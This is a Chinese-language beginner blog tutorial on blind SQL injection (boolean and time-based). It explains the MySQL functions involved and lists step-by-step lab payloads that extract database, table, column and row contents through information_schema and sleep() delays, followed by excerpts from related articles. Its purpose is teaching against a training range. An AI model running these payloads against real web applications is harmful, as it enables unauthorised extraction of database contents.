web安全入门(第四章-4)盲注注入

最新推荐文章于 2023-08-29 00:27:46 发布
最新推荐文章于 2023-08-29 00:27:46 发布
阅读量401 收藏
点赞数
分类专栏: 安全入门 文章标签: 字符串 sql 数据库 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YINZHE_/article/details/106355696
版权

一、盲注介绍

  所谓盲注就是在服务器没有错误回显的时候完成的注入攻击。
服务器没有错误回显,对于攻击者来说缺少了非常重要的“调试信息”。

布尔盲注
    布尔很明显trup跟fales,也就是说他只会根据你的诸如信息
	返回trup跟fales,也就没有了之前的报错信息。
	
时间盲注
    界面返回值只有一种,trup无论输入任何值,返回情况都会按
	正常的来处理。加入特定的时间函数,通过查看web页面返回的时间差
    来判断注入的语句是否正确。

二、盲注需要掌握的几个函数

length()函数,返回字符串的长度  select length(123456);
substr()截取字符串(语法:substr(str,pos,len);)  select substr(str,pos,len);  
ascii()返回字符串的ascii码[将字符串变为数字wei]  select ascii('a');
sleep()将程序挂起一段时间n为n秒
if(expr1,expr2,expr3)判断语句,如果第一个语句正常就执行第二个语句如果错误就执行第三个语句

三、盲注靶场的做法

猜解当前数据库名称长度:
id=1' and(length(database()))>9#
利用ascii码猜解当前数据库名称:
and(ascii(substr(database(),1,1)))=115--+返回正常,说明数据库名称第一位是s
and(ascii(substr(database(),2,1)))=101--+返回正常,说明数据库名称第一位是e

猜表名:
and(ascii(substr((select table_name from information_schema.tables where table_schema=database()
limit 0,1),1,1)))=101--+ 返回正常,说明数据库表名的第一个的第一位是e

猜字段名:
and(ascii(substr((select column_name from information_schema.columns where table_name='zkaq'
limit 0,1),1,1)))=102--+返回正常,说明zkaq表中的列名称第一位是f

猜内容:
and(ascii(substr((select zkaq from zkaq limit 4,1),1,1)))=122--+返回正常,说明zkaq列第一位是z

四、延时注入靶场做法

if(expr1,expr2,expr3)判断语句,如果第一个语句正常就执行第二个语句如果错误就执行第三个语句
and if(ascii(substr(database(),1,1))>120,0,sleep(10))--+

第一关:select*from news where id="1"
and if(length(database())=12,sleep(5),'a')-- qwe"
And if(ascii(substr(database()1,1))=107,sleep(2),’a’) -- qwe”
第二关:select*from news where id=('1')

延时盲注其实和布尔盲注没有什么他大区别,只不过是依靠页面是否正常判断,一个是否
延时判断,在操作上其实也差不多,只不过延时多个if()

if(ascii(substr(database(),1,1)) >1,sleep(2),%27a%27)
if(条件,成立则执行第二个参数,否则执行地三个参数)

ascii(substr(database(),1,1)) >1
当前库名第一个字符对应的ascii码是否大于1

综上,这句话得意思是
当前库名得第一个字符对应的ascii码如果大于1,则延迟2秒,否则返回a
YINZHE_
关注
专栏目录
WebGoat——盲注
OOM
08-14 2096
工具介绍:盲注可以通过人工去做,但是成本太高,Webgoat提供一个工具Simple JHijack(下载地址),通过与Tamper Data(使用方法)的结合使用,能够完成部分盲注。 界面介绍: 具体的实施 1、Webgoat——Blind Numeric SQL Injection The form below allows a user to enter an account
WEB入门——SQL注入(一)
HasntStartIsOver的博客
06-03 1322
简单的SQL注入
WEB新手之布尔盲注
weixin_33971130的博客
04-29 137
  开始写SQL的题,单引号等特殊符号闭合漏洞比较简单,因此从Less-5开始写。   布尔盲注是多种盲注的一种,这种盲注方法也比较好理解。但使用这种盲注有一个前提,就是网页会有回显,透过这个回显,我们可以通过判断,来获得所需的信息。   以Less-5为例题,如图所示:   加上id=1,会发现这样的回显,如图所示:   然后利用Less-1~4的知识,发现这里的语句...
SQL注入
fortoscer的博客
11-24 1031
这是一种攻击。 描述 SQL(结构化查询语言)注射是一种类型的SQL注入攻击,询问数据库真或假的问题,并确定基于该应用程序的响应的答复。当web应用程序被配置为显示一般错误消息,但并没有缓解是易受SQL注入代码此攻击经常被使用。 当攻击者利用SQL注入,有时Web应用程序从数据库中抱怨SQL查询的语法不正确显示错误消息。SQL注入几乎是相同的正常SQL注入,唯一的区别是将数据从数据库中检索的方式。当数据库不输出数据到网页中,攻击者被迫通过询问数据库一系列真或假的问题窃取数据。这使得利用SQL注入漏洞比较
web ------ SQL注入------盲注
L0g1c的博客
07-20 270
有时目标存在注入,但是页面上没有任何回显,此时,我们需要利用一些方法进行判断或者尝试得到数据,这个过程称之为盲注
WEB安全实战(一)SQL盲注
热门推荐
紫羽风的博客
10-30 3万+
前言 好长时间没有写过东西了,不是不想写,只不过是一直静不下心来写点东西。当然,拖了这么长的时间,也总该写点什么的。最近刚刚上手安全方面的东西,作为一个菜鸟,也本着学习的目的,就谈谈最近接触到的安全方面的问题吧。 背景 既然提到了背景,那我们就简单的带一下,最近互联网上爆出了各种惊人的事件、各种门、各种照的,归根结底,都是网络安全出的问题,有的是网络被别人监控
Web入门Sql注入(二)
qq_51459823的博客
11-16 1122
通过触发 SQL 错误来诱导条件响应 在前面的示例中,假设应用程序执行相同的 SQL 查询,但根据查询是否返回任何数据,行为没有任何不同。前面的技术将不起作用,因为注入不同的布尔条件对应用程序的响应没有影响。 在这种情况下,根据注入的条件,通常可以通过有条件地触发 SQL 错误来诱导应用程序返回条件响应。这涉及修改查询,以便在条件为真时会导致数据库错误,但如果条件为假则不会。很多时候,数据库抛出的未处理的错误会导致应用程序的响应(例如错误消息)出现一些差异,从而使我们能够推断注入条件的真实性。 要查看
Web入门SQL注入(一)
qq_51459823的博客
11-12 652
昨天装好了工具,今天开始入门Web吧!就以Burpsuite官方靶场作为学习Web的起点 如下知识为刷Burpsite官方靶场所得,部分为自我思考,如有错误,希望各位提出: 首先我们先了解一下: 什么是 SQL 注入 (SQLi)? SQL 注入是一种 Web 安全漏洞,允许攻击者干扰应用程序对其数据库进行的查询。它通常允许攻击者查看他们通常无法检索的数据。这可能包括属于其他用户的数据,或应用程序本身能够访问的任何其他数据。在许多情况下,攻击者可以修改或删除这些数据,从而导致应用程序的内容或行为发生
网络安全入门到精通(第四章-2)GET&POST&HEAD注入
weixin_43643758的博客
03-29 534
本文内容: GET注入 POST注入 Head注入 sqlmap工具注入 get&post为显错注入: head为报错注入: 1,GET注入:   get注入属于显错注入。     1.判断注入点:       最古老的的方法是:         http://www.xxx.com/new.php?id=1 and 1=1 页面显示正常。         http:...
网络安全CTF流量分析-入门1-流量分析中的Sql注入
最新发布
m0_51198141的博客
08-29 1378
一般流量除非是加密或者不常见的协议,否则通常都建议打开导出==>HTTP查看报文大致信息。经过观察,发现是逐个读取尝试试验ASCII码,通过返回包的大小来进行校验。如果不了解Sql注入的可以先去学习一下Sql注入。通过排序后,可以看到是从第一位爆破到第25位。打开数据包观察是HTTP报文为主。这里观察到了Sql流量的特征。获得正确值返回包大小是704。获得错误值返回包大小是720。这里可以根据大小排序。Ascii码转码得到。
Blind_SPOT:点是一个python工具,用于盲注漏洞,基于SQLi时间,命令注入代码注入,SSTI
05-30
点是一个python工具,用于盲注漏洞,基于SQLi时间,命令注入代码注入,SSTI 要求 :- Python3 请求和 colorama 库 用法 :- -u ===>目标网址 在您的注入区域或参数中添加 [*] -p payload_list ,有 r zahir009 与工具 <3 python3 -u -p 有效载荷列表 保持 H4cking .. ^^
4-Web安全——SQL盲注
网络安全
05-23 891
1. SQL盲注 在进行SQL注入过程中,如果当前页面没有报错回显,无法获取数据库返回结果的情况下,可以通过SQL盲注的方式对数据库中的内容进行猜解,盲注类型主要分为:布尔盲注和时间盲注。 当web页面只返回真假(true或false)两种不同类型的结果情况下,利用页面返回的不同类型结果逐个猜解数据,就可以使用布尔盲注,如果web页面不返回true或false类型的结果,则可以使用时间注入。 真实的注入环境中,web页面肯定不会直接回显true或false的,一般来说可以根据页面返回的结果作为依.
初学Web安全sql注入(四)—— 盲注(1)
weixin_47531846的博客
12-03 228
盲注 当你的输入没有回显,也没有报错的时候,但是输入正确和错误的值时,页面有不同表现时,这时候我们可以尝试使用布尔盲注 布尔盲注sqli-labs第八关来举列 首先输入id=1,页面显示如下: 输入id=1’,页面出现不同结果,判断有闭合: 再次输入id=1",页面结果显示正常,初步判断语句闭合为单引号闭合: 接下来,我们就可以先尝试判断当前数据库的长度,然后再拆解表名,但是这里省略这一步,直接判断当前数据库有多少个表,构造语句开始尝试: PS:因为手工注入非常的耗费时间,所以我这里采用半自动
WEB漏洞攻防 - SQL注入 - 盲注
易编橙 · 终身成长社群,相遇已是上上签!
07-29 1110
盲注就是在注入过程中,获取的数据不能回显至前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。我们可以知道盲注分为以下三类:[这里介绍的是基于MYSQL的函数,其他类型的数据库思路相同,仅函数上有些许差异]
代码注入的三种方法
xumaojun的专栏
08-31 2198
http://www.vckbase.com/index.php/wv/1580   目录 Windows 钩子 CreateRemoteThread 和 LoadLibrary 技术 ――进程间通信 CreateRemoteThread 和 WriteProcessMemory 技术 ――如何用该技术子类化远程控件 ――何时使用 CreateRemoteThread
SQL盲注入技术
05-30 853
HackChecker 黑测工作室 - 专注于软件安全测试技术研究!(www.AutomationQA.com) SQL盲注入技术 SQL盲注入技术 Ferruh Mavituna www.portc ullis- sec urity.c om 翻译:daokers         注:我把Deep Blind SQL Injection译为SQL盲注入技术或者SQL高级盲注
web安全 sql盲注和报错注入
m0_68167825的博客
06-13 821
可以基于这个函数,实现盲注。 例: 输入1’ and length(database())>3 – -得到了结果没有报错,所以可以得到数据库名字节数大于3, 输入1’ and length(database())>4 – -得到了结果报错,所以得到数据库名字节数不大于4, 输入1’ and length(database())=4 – -得到结果没报错,所以得到数据库名字节数为4.根据这两个函数得作用,来做盲注猜测。 输入1’ and ascii(substr(database(),1,1))>99 –
sql盲注 解决_SQL盲注攻击的简单介绍
weixin_42309599的博客
12-29 545
3.2 判断数据库类型攻击者一旦确定了正确的注入句法后,就会开始利用注入去判断后台数据库的类型,这个步骤比确定注入句法要简单得多。攻击者一般会使用以下几种技巧,这些技巧是基于不同类型数据库引擎在具体实现上的差异。下面只介绍如何区分Oracle和MS SQL Server:最简单的办法,就是前面提到的利用字符串的连结符号,在注入句法已经确定的情况下,攻击者可以对WHERE语句自由地添加额外的表达式,...
渗透测试技术----常见web漏洞--SQL盲注攻击原理及防御
wwl012345的博客
08-19 3779
一、SQL盲注攻击介绍 1.SQL盲注简介 盲注是在SQL注入攻击过程中,服务器关闭了错误回显,我们单纯通过服务器返回的简单内容的变化来判断服务器是否存在注入。 2.SQL盲注的方法 (boolean-based)boolean型注入:通过页面的返回内容是否正确来验证是否存在着注入 (time-based)时间型注入:通过SQL语句的处理时间的不同来判断是否存在注入,时间型注入可以使用be...
[第一章 web入门]sql注入-1
06-28
### 回答1: SQL注入是一种常见的攻击方式,攻击者通过在Web应用程序中注入恶意的SQL语句,从而获取敏感信息或者执行非法操作。SQL注入攻击的原理是利用Web应用程序没有对用户输入的数据进行充分的过滤和验证,从而导致恶意SQL语句被执行。为了防止SQL注入攻击,开发人员需要对用户输入的数据进行严格的过滤和验证,同时使用参数化查询等技术来防止SQL注入攻击。 ### 回答2: SQL注入攻击是指攻击者通过把恶意的SQL语句插入到应用程序输入数据中的方法,来实现非法操作或篡改数据的一种攻击技术。攻击者利用SQL注入漏洞可以获取敏感数据,改变数据库中的数据,甚至完全控制应用程序。 攻击者利用SQL注入漏洞,可以通过几种方法来实现攻击。以下是一些常见的SQL注入攻击方式: 1.基于错误的注入:攻击者可以通过注入恶意SQL语句,导致应用程序出现错误或异常,从而获得应用程序内部的敏感数据。 2.盲注注入:攻击者可以通过注入语句,来获取数据库信息,如数据库版本,或者判断SQL查询的结果是否正确。 3.联合查询注入:攻击者可以通过在注入语句中添加SELECT语句,来获取敏感数据或执行一些非法操作。 SQL注入攻击作为一种常见的网络攻击方式,需要我们在开发过程中加强对应用程序输入数据进行过滤和检查,以防止SQL注入漏洞。以下是一些预防SQL注入攻击的方法: 1.使用参数化查询:应用程序可以使用参数化查询语句,通过绑定参数来保证输入数据不会被作为SQL语句的一部分执行。 2.限制用户输入:应用程序可以限制用户输入的字符集合,或对用户输入的内容进行验证和过滤。 3.对于敏感数据,可以使用加密等措施来保证数据的安全性。 总之,应用程序开发者需要认识到SQL注入攻击的威胁,并在开发过程中采取一些预防措施来保证应用程序的安全性。 ### 回答3: SQL注入是一种常见的网络攻击方式,旨在通过在输入框或者URL中注入SQL代码,以达到破坏或者获取数据库数据的目的。SQL注入可以通过输入合法的SQL语句来实现,或者通过输入特定的字符来执行恶意代码SQL注入攻击的原理在于,攻击者在输入框或者URL中输入包含SQL关键词的字符,这些字符会被解释成SQL命令执行,并且会以其余参数的身份执行,这意味着该攻击可以以管理员的身份执行,且能获取数据库的全部数据。 SQL注入攻击的表现可以是网站遭到入侵或者数据库中数据突然消失或者受到修改。为了防止SQL注入攻击,应该首先排除参数化输入的漏洞,即对于用户输入的数据需要进行过滤,过滤掉控制字符,即可有效地防止SQL注入攻击。 总之,SQL注入攻击是一种网络安全威胁,要防范此类攻击,网站管理者应当在网站上做好安全措施,确保用户输入的数据进行有效的过滤和检查以保证安全性。同时,网站用户也应避免输入不必要的信息和暴露个人隐私等信息,以避免成为攻击者的目标。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值